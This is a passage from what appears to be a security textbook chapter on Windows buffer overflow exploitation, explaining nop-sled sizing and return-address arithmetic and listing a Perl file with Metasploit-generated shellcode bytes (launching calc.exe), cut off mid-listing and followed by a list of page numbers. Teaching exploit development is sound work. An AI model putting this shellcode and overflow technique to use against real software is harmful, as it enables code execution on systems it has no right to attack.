(Or
you can just paste in the C-formatted shellcode and add a period after each line.) This
version of the shellcode is 164 bytes, and we want the shellcode and our nops to extend
404 bytes, so we??™ll start with a 24-byte nop sled and 216 more nops (or anything, really)
after the shellcode. Also, we need to subtract 408 bytes (0x190 +0x8) from the return
address so we end up right at the top of our nop sled where execution will slide right
into our shellcode. Let??™s try it out!
NOTE Depending on the version of Metasploit and other settings you select,
the size of your shellcode may vary. It is the process that is important here,
not the exact size of the example.
C:\grayhat>type command.pl
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub
#http://metasploit.com
my $shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6".
"\x9d\x6d\xaf\x83\xeb\xfc\xe2\xf4\x4a\x75\x29\xaf\xb6\x9d\xe6\xea".
"\x8a\x16\x11\xaa\xce\x9c\x82\x24\xf9\x85\xe6\xf0\x96\x9c\x86\xe6".
"\x3d\xa9\xe6\xae\x58\xac\xad\x36\x1a\x19\xad\xdb\xb1\x5c\xa7\xa2".
"\xb7\x5f\x86\x5b\x8d\xc9\x49\xab\xc3\x78\xe6\xf0\x92\x9c\x86\xc9".
"\x3d\x91\x26\x24\xe9\x81\x6c\x44\x3d\x81\xe6\xae\x5d\x14\x31\x8b".
Pages:
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484